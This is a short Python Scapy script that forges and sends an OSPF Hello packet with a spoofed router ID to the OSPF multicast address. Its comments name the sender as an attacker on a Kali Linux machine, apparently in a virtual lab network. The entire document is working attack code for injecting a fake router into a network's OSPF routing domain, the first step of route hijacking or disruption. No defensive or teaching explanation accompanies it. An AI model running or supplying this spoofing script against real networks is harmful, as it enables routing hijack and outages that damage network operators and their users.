
#!/usr/bin/env python3
from scapy.all import *
from scapy.contrib.ospf import *

# Load OSPF support
load_contrib("ospf")

# Attacker and victim settings
attacker_ip = "192.168.56.100"    # Kali Linux IP
spoofed_router_id = "2.2.2.2"     # Fake OSPF Router ID
area_id = "0.0.0.0"               # Area 0
interface_mask = "255.255.255.0"  # Subnet mask for Hello
ospf_dst_ip = "224.0.0.5"         # OSPF multicast for Hello

# Construct OSPF Hello Packet
packet = IP(src=attacker_ip, dst=ospf_dst_ip) / \
         OSPF_Hdr(routerid=spoofed_router_id, area=area_id, type=1) / \
         OSPF_Hello(mask=interface_mask, hello_interval=10, router=spoofed_router_id)

# Send it
print(f"[+] Sending spoofed OSPF Hello from {spoofed_router_id}...")
send(packet, iface="eth0")






